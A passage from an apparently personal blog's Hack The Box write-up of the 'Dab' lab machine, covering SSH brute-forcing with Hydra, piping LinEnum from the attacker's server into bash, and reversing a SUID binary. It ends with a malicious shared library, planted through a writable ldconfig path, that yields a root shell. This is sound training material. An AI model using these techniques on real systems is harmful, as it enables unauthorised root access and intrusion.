\nroot@kali:~\/Documents\/htb\/boxes\/dab# hydra -C users_cracked.txt 10.10.10.86 ssh\nHydra v8.6 (c) 2017 by van Hauser\/THC - Please do not use in military or secret service organizations, or for illegal purposes.\n\nHydra (http:\/\/www.thc.org\/thc-hydra) starting at 2019-01-15 03:20:11\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries, ~1 try per task\n[DATA] attacking ssh:\/\/10.10.10.86:22\/\n[22][ssh] host: 10.10.10.86   login: genevieve   password: Princess1\n1 of 1 target successfully completed, 1 valid password found\nHydra (http:\/\/www.thc.org\/thc-hydra) finished at 2019-01-15 03:20:14\n\n<\/pre><\/div>\n\n
Nice! We found valid credentials for SSH: genevieve:Princess1<\/code>. Let’s verify this by connecting with SSH:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# ssh genevieve@10.10.10.86\ngenevieve@10.10.10.86's password: \nWelcome to Ubuntu 16.04.5 LTS (GNU\/Linux 4.4.0-133-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n0 packages can be updated.\n0 updates are security updates.\n\n\nLast login: Tue Jan 15 03:10:06 2019 from 10.10.13.71\ngenevieve@dab:~$ id\nuid=1000(genevieve) gid=1000(genevieve) groups=1000(genevieve)\ngenevieve@dab:~$ \n\n<\/pre><\/div>\n\n
We successfully logged in. Now we can read the first flag file user.txt<\/code>:<\/p>\n\n
\ngenevieve@dab:~$ ls -al\ntotal 36\ndrwxr-xr-x 4 genevieve genevieve 4096 Jan 15 03:17 .\ndrwxr-xr-x 3 root      root      4096 Mar 19  2018 ..\nlrwxrwxrwx 1 root      root         9 Aug 15 06:22 .bash_history -> \/dev\/null\n-rw-r--r-- 1 genevieve genevieve  220 Mar 19  2018 .bash_logout\n-rw-r--r-- 1 genevieve genevieve 3793 Mar 25  2018 .bashrc\ndrwx------ 2 genevieve genevieve 4096 Jan 15 03:19 .cache\n-rw-r--r-- 1 genevieve genevieve  655 Mar 19  2018 .profile\ndrwx------ 2 genevieve genevieve 4096 Jan 15 02:01 .ssh\n-r-------- 1 genevieve genevieve   33 Mar 19  2018 user.txt\n-rw------- 1 genevieve genevieve  991 Jan 15 03:17 .viminfo\ngenevieve@dab:~$ cat user.txt \n9bcd ... (output truncated)\n\n<\/pre><\/div>\n\n
I truncated the output to avoid the temptation of just copy\/pasting the flag.<\/p>\n
After successfully gaining access to the machine as a user, we now proceed with the privilege escalation to root.<\/p>\n
\n
Root<\/h2>\n
Initial Enumeration<\/h3>\n
A good way to initially enumerate a system is LinEnum<\/a>. In order to run the LinEnum.sh<\/code> script, we host it on our attacker machine using python -m SimpleHTTPServer<\/code> …<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# wget https:\/\/github.com\/rebootuser\/LinEnum\/raw\/master\/LinEnum.sh\n--2019-01-15 04:23:40--  https:\/\/github.com\/rebootuser\/LinEnum\/raw\/master\/LinEnum.sh\nResolving github.com (github.com)... 192.30.253.112, 192.30.253.113\nConnecting to github.com (github.com)|192.30.253.112|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https:\/\/raw.githubusercontent.com\/rebootuser\/LinEnum\/master\/LinEnum.sh [following]\n--2019-01-15 04:23:40--  https:\/\/raw.githubusercontent.com\/rebootuser\/LinEnum\/master\/LinEnum.sh\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.12.133\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.12.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 45578 (45K) [text\/plain]\nSaving to: \u2018LinEnum.sh\u2019\n\nLinEnum.sh                         100%[===============================================================>]  44.51K  --.-KB\/s    in 0.02s   \n\n2019-01-15 04:23:40 (2.88 MB\/s) - \u2018LinEnum.sh\u2019 saved [45578\/45578]\n\nroot@kali:~\/Documents\/htb\/boxes\/dab# python -m SimpleHTTPServer\nServing HTTP on 0.0.0.0 port 8000 ...\n\n<\/pre><\/div>\n\n
… and pipe it to bash<\/code> on the target machine. This way we directly execute the script and do not leave traces by downloading it to disk:<\/p>\n\n
\ngenevieve@dab:~$  curl http:\/\/10.10.12.142:8000\/LinEnum.sh | bash\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100 45578  100 45578    0     0   598k      0 --:--:-- --:--:-- --:--:--  601k\n\n#########################################################\n# Local Linux Enumeration & Privilege Escalation Script #\n#########################################################\n# www.rebootuser.com\n# version 0.94\n\n[-] Debug Info\n[+] Thorough tests = Disabled (SUID\/GUID checks will not be perfomed!)\n\n\nScan started at:\nTue Jan 15 04:24:16 EST 2019\n\n\n### SYSTEM ##############################################\n[-] Kernel information:\nLinux dab 4.4.0-133-generic #159-Ubuntu SMP Fri Aug 10 07:31:43 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\n\n\n[-] Kernel information (continued):\nLinux version 4.4.0-133-generic (buildd@lgw01-amd64-029) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #159-Ubuntu SMP Fri Aug 10 07:31:43 UTC 2018\n...\n\n<\/pre><\/div>\n\n
After examining the output we get a general idea of the basic configuration of the system. Since there are no real striking abnormalities, we keep on looking for escalation possibilities manually.<\/p>\n
SUID binaries<\/h3>\n
One common way to escalate privileges are vulnerable SUID binaries. These can be identified by enabling thorough tests in the LinEnum.sh<\/code> script, but we can also search for those binaries using find<\/code>:<\/p>\n\n
\ngenevieve@dab:~$ find \/ -xdev -perm -4000 2>\/dev\/null\n\/bin\/umount\n\/bin\/ping\n\/bin\/ping6\n\/bin\/su\n\/bin\/ntfs-3g\n\/bin\/fusermount\n\/bin\/mount\n\/usr\/bin\/at\n\/usr\/bin\/newuidmap\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/bin\/newgidmap\n\/usr\/bin\/myexec\n\/usr\/bin\/pkexec\n\/usr\/bin\/chfn\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/sbin\/ldconfig\n\/sbin\/ldconfig.real\n\n<\/pre><\/div>\n\n
A quick explanation of the used options:<\/p>\n\n\n\n\n\n\n
Option<\/td>\nDescription<\/td>\n<\/tr>\n
\/<\/code><\/td>\nStart searching from the root-directory.<\/td>\n<\/tr>\n
-xdev<\/code><\/td>\nDon’t descend directories on other filesystems (mainly to exclude \/dev<\/code>, \/proc<\/code> and \/sys<\/code>).<\/td>\n<\/tr>\n
-perm -4000<\/code><\/td>\nSearch for files\/directories with the SUID bit set.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
In order to spot abnormalities here, it is very helpful if you have already some experience in knowing which files are usually SUID binaries. Of course you can also run the find<\/code> command on an untouched reference machine and compare the results.<\/p>\n
One file which sticks out here is \/usr\/bin\/myexec<\/code>, which does not exist by default. Also the SUID bit of \/sbin\/ldconfig<\/code> and \/sbin\/ldconfig.real<\/code> is usually not set.<\/p>\n
myexec<\/h3>\n
In order to analyze the file \/usr\/bin\/myexec<\/code> we download it to our attacker machine:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# scp genevieve@10.10.10.86:\/usr\/bin\/myexec .\ngenevieve@10.10.10.86's password: \nmyexec                                                                                     100% 8864   421.8KB\/s   00:00    \n\n<\/pre><\/div>\n\n
Now we can use radare2<\/code> to analyze the binary disassembling the main<\/code> function:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# r2 -A myexec \n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Constructing a function name for fcn.* and sym.func.* functions (aan)\n[x] Type matching analysis for all functions (afta)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[0x00400740]> afl\n0x00400690    3 26           sym._init\n0x004006c0    1 6            sym.imp.puts\n0x004006d0    1 6            sym.imp.__stack_chk_fail\n0x004006e0    1 6            sym.imp.printf\n0x004006f0    1 6            sym.imp.seclogin\n0x00400700    1 6            sym.imp.__libc_start_main\n0x00400710    1 6            sym.imp.strcmp\n0x00400720    1 6            sym.imp.__isoc99_scanf\n0x00400730    1 6            sub.__gmon_start_730\n0x00400740    1 41           entry0\n0x00400770    4 50   -> 41   sym.deregister_tm_clones\n0x004007b0    4 58   -> 55   sym.register_tm_clones\n0x004007f0    3 28           sym.__do_global_dtors_aux\n0x00400810    4 38   -> 35   entry1.init\n0x00400836    6 173          main\n0x004008f0    4 101          sym.__libc_csu_init\n0x00400960    1 2            sym.__libc_csu_fini\n0x00400964    1 9            sym._fini\n[0x00400740]> pdf @ main\n\/ (fcn) main 173\n|   main (int argc, char **argv, char **envp);\n|           ; var unsigned int local_64h @ rbp-0x64\n|           ; var char *s1 @ rbp-0x60\n|           ; var int local_58h @ rbp-0x58\n|           ; var char *s2 @ rbp-0x50\n|           ; var int canary @ rbp-0x8\n|           ; DATA XREF from entry0 (0x40075d)\n|           0x00400836      55             push rbp\n|           0x00400837      4889e5         mov rbp, rsp\n|           0x0040083a      4883ec70       sub rsp, 0x70               ; 'p'\n|           0x0040083e      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=-1 ; '(' ; 40\n|           0x00400847      488945f8       mov qword [canary], rax\n|           0x0040084b      31c0           xor eax, eax\n|           0x0040084d      48b873336375.  movabs rax, 0x306c337275633373 ; 's3cur3l0'\n|           0x00400857      488945a0       mov qword [s1], rax\n|           0x0040085b      c745a867316e.  mov dword [local_58h], 0x6e3167 ; 'g1n'\n|           0x00400862      bf74094000     mov edi, str.Enter_password: ; 0x400974 ; "Enter password: " ; const char *format\n|           0x00400867      b800000000     mov eax, 0\n|           0x0040086c      e86ffeffff     call sym.imp.printf         ; int printf(const char *format)\n|           0x00400871      488d45b0       lea rax, qword [s2]\n|           0x00400875      4889c6         mov rsi, rax\n|           0x00400878      bf85094000     mov edi, str.63s            ; 0x400985 ; "%63s" ; const char *format\n|           0x0040087d      b800000000     mov eax, 0\n|           0x00400882      e899feffff     call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n|           0x00400887      488d55b0       lea rdx, qword [s2]\n|           0x0040088b      488d45a0       lea rax, qword [s1]\n|           0x0040088f      4889d6         mov rsi, rdx                ; const char *s2\n|           0x00400892      4889c7         mov rdi, rax                ; const char *s1\n|           0x00400895      e876feffff     call sym.imp.strcmp         ; int strcmp(const char *s1, const char *s2)\n|           0x0040089a      89459c         mov dword [local_64h], eax\n|           0x0040089d      837d9c00       cmp dword [local_64h], 0\n|       ,=< 0x004008a1      7411           je 0x4008b4\n|       |   0x004008a3      bf8a094000     mov edi, str.Invalid_password ; 0x40098a ; "Invalid password\\n" ; const char *s\n|       |   0x004008a8      e813feffff     call sym.imp.puts           ; int puts(const char *s)\n|       |   0x004008ad      b801000000     mov eax, 1\n|      ,==< 0x004008b2      eb19           jmp 0x4008cd\n|      ||   ; CODE XREF from main (0x4008a1)\n|      |`-> 0x004008b4      bf9c094000     mov edi, str.Password_is_correct ; 0x40099c ; "Password is correct\\n" ; const char *s\n|      |    0x004008b9      e802feffff     call sym.imp.puts           ; int puts(const char *s)\n|      |    0x004008be      b800000000     mov eax, 0\n|      |    0x004008c3      e828feffff     call sym.imp.seclogin\n|      |    0x004008c8      b800000000     mov eax, 0\n|      |    ; CODE XREF from main (0x4008b2)\n|      `--> 0x004008cd      488b4df8       mov rcx, qword [canary]\n|           0x004008d1      6448330c2528.  xor rcx, qword fs:[0x28]\n|       ,=< 0x004008da      7405           je 0x4008e1\n|       |   0x004008dc      e8effdffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)\n|       |   ; CODE XREF from main (0x4008da)\n|       `-> 0x004008e1      c9             leave\n\\           0x004008e2      c3             ret\n[0x00400740]> \n\n<\/pre><\/div>\n\n
At first the string \"Enter password: \"<\/code> is printed:<\/p>\n\n
\n|           0x00400862      bf74094000     mov edi, str.Enter_password: ; 0x400974 ; "Enter password: " ; const char *format\n|           0x00400867      b800000000     mov eax, 0\n|           0x0040086c      e86ffeffff     call sym.imp.printf         ; int printf(const char *format)\n\n\n<\/pre><\/div>\n\n
Then a string with a maximum length of 63 bytes is read from stdin:<\/p>\n\n
\n|           0x00400878      bf85094000     mov edi, str.63s            ; 0x400985 ; "%63s" ; const char *format\n|           0x0040087d      b800000000     mov eax, 0\n|           0x00400882      e899feffff     call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n\n<\/pre><\/div>\n\n
After this the entered string (stored in s2<\/code>) is compared to a string stored in s1<\/code>:<\/p>\n\n
\n|           0x00400887      488d55b0       lea rdx, qword [s2]\n|           0x0040088b      488d45a0       lea rax, qword [s1]\n|           0x0040088f      4889d6         mov rsi, rdx                ; const char *s2\n|           0x00400892      4889c7         mov rdi, rax                ; const char *s1\n|           0x00400895      e876feffff     call sym.imp.strcmp         ; int strcmp(const char *s1, const char *s2)\n\n<\/pre><\/div>\n\n
If the strings are not equal, \"Invalid password\"<\/code> is printed:<\/p>\n\n
\n|       |   0x004008a3      bf8a094000     mov edi, str.Invalid_password ; 0x40098a ; "Invalid password\\n" ; const char *s\n|       |   0x004008a8      e813feffff     call sym.imp.puts           ; int puts(const char *s)\n\n<\/pre><\/div>\n\n
I<\/p>\n
If the strings are<\/b> equal, \"Password is correct\"<\/code> is printed and the function seclogin<\/code> is called:<\/p>\n\n
\n|      |`-> 0x004008b4      bf9c094000     mov edi, str.Password_is_correct ; 0x40099c ; "Password is correct\\n" ; const char *s\n|      |    0x004008b9      e802feffff     call sym.imp.puts           ; int puts(const char *s)\n|      |    0x004008be      b800000000     mov eax, 0\n|      |    0x004008c3      e828feffff     call sym.imp.seclogin\n\n<\/pre><\/div>\n\n
libseclogin.so<\/h3>\n
The function seclogin<\/code> is defined in an additional shared library:<\/p>\n\n
\ngenevieve@dab:~$ ldd \/usr\/bin\/myexec \n\tlinux-vdso.so.1 =>  (0x00007ffc4b767000)\n\tlibseclogin.so => \/usr\/lib\/libseclogin.so (0x00007fa492368000)\n\tlibc.so.6 => \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007fa491f9e000)\n\t\/lib64\/ld-linux-x86-64.so.2 (0x00007fa49256a000)\n\n<\/pre><\/div>\n\n
We download this shared library to our attacker machine, too:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# scp genevieve@10.10.10.86:\/usr\/lib\/libseclogin.so .\ngenevieve@10.10.10.86's password: \nlibseclogin.so                                                                                          100% 8120   384.8KB\/s   00:00    \n\n<\/pre><\/div>\n\n
And disassemble the function using radare2<\/code>:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# r2 -A libseclogin.so \n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Constructing a function name for fcn.* and sym.func.* functions (aan)\n[x] Type matching analysis for all functions (afta)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[0x000005a0]> afl\n0x00000000    4 67   -> 68   sym.imp.__cxa_finalize\n0x00000548    3 26           sym._init\n0x00000580    1 6            sym.imp.puts\n0x00000590    1 6            sub.__gmon_start_590\n0x00000598    1 6            sub.__cxa_finalize_598\n0x000005a0    4 50   -> 44   entry0\n0x000005e0    4 66   -> 57   sym.register_tm_clones\n0x00000630    5 50           sym.__do_global_dtors_aux\n0x00000670    4 48   -> 42   entry1.init\n0x000006a0    1 35           sym.seclogin\n0x000006c4    1 9            sym._fini\n[0x000005a0]> pdf @ sym.seclogin \n\/ (fcn) sym.seclogin 35\n|   sym.seclogin ();\n|           0x000006a0      55             push rbp\n|           0x000006a1      4889e5         mov rbp, rsp\n|           0x000006a4      488d3d250000.  lea rdi, qword str.seclogin___called ; section..rodata ; 0x6d0 ; "seclogin() called" ; const char *s\n|           0x000006ab      e8d0feffff     call sym.imp.puts           ; int puts(const char *s)\n|           0x000006b0      488d3d310000.  lea rdi, qword str.TODO:_Placeholder_for_now__function_not_implemented_yet ; 0x6e8 ; "TODO: Placeholder for now, function not implemented yet" ; const char *s\n|           0x000006b7      e8c4feffff     call sym.imp.puts           ; int puts(const char *s)\n|           0x000006bc      b800000000     mov eax, 0\n|           0x000006c1      5d             pop rbp\n\\           0x000006c2      c3             ret\n\n<\/pre><\/div>\n\n
The function merely prints the string \"TODO: Placeholder for now, function not implemented yet\"<\/code>.<\/p>\n
Since the myexec<\/code> binary has the SUID bit enabled, the function is called with root privileges. If we find a way to replace it with our own code, we get root access.<\/p>\n
myexec’s password<\/h3>\n
At first we need to determine the password, which must be entered to call the function seclogin<\/code>. This can be done by statically analyzing the disassembly (reversing) or by simply debugging it dynamically setting a breakpoint on the strcmp<\/code> call. Let’s start with the static approach and review the disassembly of the main<\/code> function:<\/p>\n\n
\n|           0x0040084d      48b873336375.  movabs rax, 0x306c337275633373 ; 's3cur3l0'\n|           0x00400857      488945a0       mov qword [s1], rax\n|           0x0040085b      c745a867316e.  mov dword [local_58h], 0x6e3167 ; 'g1n'\n\n<\/pre><\/div>\n\n
We already know, that the string we enter is stored in s2<\/code> and that this string is compared to s1<\/code>. In the above disassmbly, we see what s1<\/code> is set to. The first 8 bytes are set to \"s3cur3l0\"<\/code> as radare2 already displays at the right side beneath the movabs<\/code> instruction. The address local_58h<\/code> is right behind those 8 bytes, where the additional 3 bytes \"g1n\"<\/code> are stored. Thus the whole string stored in s1<\/code> simply is: \"s3cur3l0g1n\"<\/code>.<\/p>\n
This was not that complicated, but just for the sake of completeness let’s also do the dynamic approach using gdb<\/code>. In order to grant gdb<\/code> access to the shared library we must first set the environment variable LD_LIBRARY_PATH<\/code> to our current directory, where the shared library is stored:<\/p>\n\n
\nroot@kali:~\/Documents\/htb\/boxes\/dab# gdb .\/myexec \nGNU gdb (Debian 8.1-4+b1) 8.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.  Type "show copying"\nand "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<http:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n<http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/myexec...(no debugging symbols found)...done.\ngdb-peda$ set env LD_LIBRARY_PATH .\ngdb-peda$ \n\n<\/pre><\/div>\n\n
Then we can simply set a breakpoint on the call to strcmp<\/code>, run the program and enter something for the password:<\/p>\n\n
\ngdb-peda$ disassemble main\nDump of assembler code for function main:\n   0x0000000000400836 <+0>:\tpush   rbp\n   0x0000000000400837 <+1>:\tmov    rbp,rsp\n   0x000000000040083a <+4>:\tsub    rsp,0x70\n   0x000000000040083e <+8>:\tmov    rax,QWORD PTR fs:0x28\n   0x0000000000400847 <+17>:\tmov    QWORD PTR [rbp-0x8],rax\n   0x000000000040084b <+21>:\txor    eax,eax\n   0x000000000040084d <+23>:\tmovabs rax,0x306c337275633373\n   0x0000000000400857 <+33>:\tmov    QWORD PTR [rbp-0x60],rax\n   0x000000000040085b <+37>:\tmov    DWORD PTR [rbp-0x58],0x6e3167\n   0x0000000000400862 <+44>:\tmov    edi,0x400974\n   0x0000000000400867 <+49>:\tmov    eax,0x0\n   0x000000000040086c <+54>:\tcall   0x4006e0 <printf@plt>\n   0x0000000000400871 <+59>:\tlea    rax,[rbp-0x50]\n   0x0000000000400875 <+63>:\tmov    rsi,rax\n   0x0000000000400878 <+66>:\tmov    edi,0x400985\n   0x000000000040087d <+71>:\tmov    eax,0x0\n   0x0000000000400882 <+76>:\tcall   0x400720 <__isoc99_scanf@plt>\n   0x0000000000400887 <+81>:\tlea    rdx,[rbp-0x50]\n   0x000000000040088b <+85>:\tlea    rax,[rbp-0x60]\n   0x000000000040088f <+89>:\tmov    rsi,rdx\n   0x0000000000400892 <+92>:\tmov    rdi,rax\n   0x0000000000400895 <+95>:\tcall   0x400710 <strcmp@plt>\n   0x000000000040089a <+100>:\tmov    DWORD PTR [rbp-0x64],eax\n   0x000000000040089d <+103>:\tcmp    DWORD PTR [rbp-0x64],0x0\n   0x00000000004008a1 <+107>:\tje     0x4008b4 <main+126>\n   0x00000000004008a3 <+109>:\tmov    edi,0x40098a\n   0x00000000004008a8 <+114>:\tcall   0x4006c0 <puts@plt>\n   0x00000000004008ad <+119>:\tmov    eax,0x1\n   0x00000000004008b2 <+124>:\tjmp    0x4008cd <main+151>\n   0x00000000004008b4 <+126>:\tmov    edi,0x40099c\n   0x00000000004008b9 <+131>:\tcall   0x4006c0 <puts@plt>\n   0x00000000004008be <+136>:\tmov    eax,0x0\n   0x00000000004008c3 <+141>:\tcall   0x4006f0 <seclogin@plt>\n   0x00000000004008c8 <+146>:\tmov    eax,0x0\n   0x00000000004008cd <+151>:\tmov    rcx,QWORD PTR [rbp-0x8]\n   0x00000000004008d1 <+155>:\txor    rcx,QWORD PTR fs:0x28\n   0x00000000004008da <+164>:\tje     0x4008e1 <main+171>\n   0x00000000004008dc <+166>:\tcall   0x4006d0 <__stack_chk_fail@plt>\n   0x00000000004008e1 <+171>:\tleave  \n   0x00000000004008e2 <+172>:\tret    \nEnd of assembler dump.\ngdb-peda$ b *main+95\nBreakpoint 1 at 0x400895\ngdb-peda$ r\nStarting program: \/root\/Documents\/htb\/boxes\/dab\/myexec \nEnter password: test\n\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fff8b3fa420 ("s3cur3l0g1n")\nRBX: 0x0 \nRCX: 0x0 \nRDX: 0x7fff8b3fa430 --> 0x74736574 ('test')\nRSI: 0x7fff8b3fa430 --> 0x74736574 ('test')\nRDI: 0x7fff8b3fa420 ("s3cur3l0g1n")\nRBP: 0x7fff8b3fa480 --> 0x4008f0 (<__libc_csu_init>:\tpush   r15)\nRSP: 0x7fff8b3fa410 --> 0x0 \nRIP: 0x400895 (<main+95>:\tcall   0x400710 <strcmp@plt>)\nR8 : 0x0 \nR9 : 0xa ('\\n')\nR10: 0x0 \nR11: 0x246 \nR12: 0x400740 (<_start>:\txor    ebp,ebp)\nR13: 0x7fff8b3fa560 --> 0x1 \nR14: 0x0 \nR15: 0x0\nEFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n   0x40088b <main+85>:\tlea    rax,[rbp-0x60]\n   0x40088f <main+89>:\tmov    rsi,rdx\n   0x400892 <main+92>:\tmov    rdi,rax\n=> 0x400895 <main+95>:\tcall   0x400710 <strcmp@plt>\n   0x40089a <main+100>:\tmov    DWORD PTR [rbp-0x64],eax\n   0x40089d <main+103>:\tcmp    DWORD PTR [rbp-0x64],0x0\n   0x4008a1 <main+107>:\tje     0x4008b4 <main+126>\n   0x4008a3 <main+109>:\tmov    edi,0x40098a\nGuessed arguments:\narg[0]: 0x7fff8b3fa420 ("s3cur3l0g1n")\narg[1]: 0x7fff8b3fa430 --> 0x74736574 ('test')\narg[2]: 0x7fff8b3fa430 --> 0x74736574 ('test')\n[------------------------------------stack-------------------------------------]\n0000| 0x7fff8b3fa410 --> 0x0 \n0008| 0x7fff8b3fa418 --> 0x0 \n0016| 0x7fff8b3fa420 ("s3cur3l0g1n")\n0024| 0x7fff8b3fa428 --> 0x6e3167 ('g1n')\n0032| 0x7fff8b3fa430 --> 0x74736574 ('test')\n0040| 0x7fff8b3fa438 --> 0x0 \n0048| 0x7fff8b3fa440 --> 0x1 \n0056| 0x7fff8b3fa448 --> 0x40093d (<__libc_csu_init+77>:\tadd    rbx,0x1)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n\nBreakpoint 1, 0x0000000000400895 in main ()\ngdb-peda$ \n\n<\/pre><\/div>\n\n
As we can see in the arguments, the string which is compared to our input is \"s3cur3l0g1n\"<\/code>.<\/p>\n
Now we can verify the password on the target machine:<\/p>\n\n
\ngenevieve@dab:~$ myexec \nEnter password: s3cur3l0g1n\nPassword is correct\n\nseclogin() called\nTODO: Placeholder for now, function not implemented yet\n\n<\/pre><\/div>\n\n
The password is actually working and the function seclogin<\/code> is called printing the TODO message.<\/p>\n
ldconfig<\/h3>\n
Our next task is to somehow replace this function with our own one. How can we do this? We have already noticed that the SUID bit of ldconfig<\/code> is set. Let’s have a look at the manpage of ldconfig<\/code>:<\/p>\n\n
\nLDCONFIG(8)                         Linux Programmer's Manual                         LDCONFIG(8)\n\nNAME\n       ldconfig - configure dynamic linker run-time bindings\n\nSYNOPSIS\n       \/sbin\/ldconfig [ -nNvXV ] [ -f conf ] [ -C cache ] [ -r root ] directory ...\n       \/sbin\/ldconfig -l [ -v ] library ...\n       \/sbin\/ldconfig -p\n\nDESCRIPTION\n       ldconfig  creates  the necessary links and cache to the most recent shared libraries found\n       in the directories specified on the command line, in the file \/etc\/ld.so.conf, and in  the\n       trusted  directories,  \/lib and \/usr\/lib (on some 64-bit architectures such as x86-64, lib\n       and \/usr\/lib are the trusted directories for 32-bit libraries, while \/lib64 and \/usr\/lib64\n       are used for 64-bit libraries).\n\n...\n\n<\/pre><\/div>\n\n
So ldconfig<\/code> is actually responsible for determining which shared library is used. The man page also states that the file \/etc\/ld.so.conf<\/code> is used to specify directories for shared libraries. Let’s have a look at this file:<\/p>\n\n
\ngenevieve@dab:~$ cat \/etc\/ld.so.conf\ninclude \/etc\/ld.so.conf.d\/*.conf\n\ngenevieve@dab:~$ ls -al \/etc\/ld.so.conf.d\/*.conf\n-rw-rw-r-- 1 root root 38 Nov 24  2014 \/etc\/ld.so.conf.d\/fakeroot-x86_64-linux-gnu.conf\n-rw-r--r-- 1 root root 44 Jan 27  2016 \/etc\/ld.so.conf.d\/libc.conf\n-rw-r--r-- 1 root root  5 Mar 25  2018 \/etc\/ld.so.conf.d\/test.conf\n-rw-r--r-- 1 root root 68 Apr 14  2016 \/etc\/ld.so.conf.d\/x86_64-linux-gnu.conf\n\n<\/pre><\/div>\n\n
The file itself only includes all *.conf<\/code> files within \/etc\/ld.so.conf.d\/<\/code>. In this directory is a file called test.conf<\/code> which surely is no default file:<\/p>\n\n
\ngenevieve@dab:~$ cat \/etc\/ld.so.conf.d\/test.conf \n\/tmp\n\n<\/pre><\/div>\n\n
The file contains the directory \/tmp<\/code> which means that ldconfig<\/code> is caching libraries stored in \/tmp<\/code>! Since we can write to \/tmp<\/code> we can store our own shared library there, run ldconfig<\/code> and then execute myexec<\/code> again. This time it will load our library and run our own code.<\/p>\n
Compile own shared Library<\/h3>\n
Since gcc<\/code> is on the target machine, we can compile a shared library directly on it:<\/p>\n\n
\ngenevieve@dab:\/tmp\/.tmp$ cat libseclogin.c\n#include <stdlib.h>\n#include <unistd.h>\n\nvoid seclogin(void) {\n  setgid(0);\n  setuid(0);\n  system("\/bin\/sh");\n}\n\ngenevieve@dab:\/tmp\/.tmp$ gcc -c -fpic libseclogin.c \ngenevieve@dab:\/tmp\/.tmp$ gcc -shared -o libseclogin.so libseclogin.o\n\n<\/pre><\/div>\n\n
The file libseclogin.c<\/code> only contains the single function seclogin<\/code>, which calls system<\/code> to spawn a shell. Beforehand setgid<\/code> and setuid<\/code> is called with the argument 0 to set the GID<\/code> and UID<\/code>, as we otherwise would only spawn a shell as our current user. This file needs to be compiled as position indepedent code (option -fpic<\/code>) and then linked to a shared library using the option -shared<\/code>.<\/p>\n
Now we can copy our shared library to \/tmp<\/code>, run ldconfig<\/code> to cache our library and then run myexec<\/code>:<\/p>\n\n
\ngenevieve@dab:\/tmp\/.tmp$ mv libseclogin.so \/tmp\ngenevieve@dab:\/tmp\/.tmp$ ldconfig\ngenevieve@dab:\/tmp\/.tmp$ myexec\nEnter password: s3cur3l0g1n\nPassword is correct\n\n# id\nuid=0(root) gid=0(root) groups=0(root),1000(genevieve)\n# cat \/root\/root.txt\n45cd...\n\n<\/pre><\/div>\n\n
We successfully spawned a shell as root and can read the flag file root.txt<\/code> \ud83d\ude42<\/p>\n
That’s it. Thanks for reading the article.<\/p>","protected":false},"excerpt":{"rendered":"
This article contains my first writeup on a machine from Hack The Box. If you have not checked out Hack The Box yet, I really suggest you do. Aside from providing classical CTF-style challenges, the plattform hosts plenty of vulnerable machines (boxes), which are supposed to be exploited. The boxes tend to be geared to … <\/p>\n
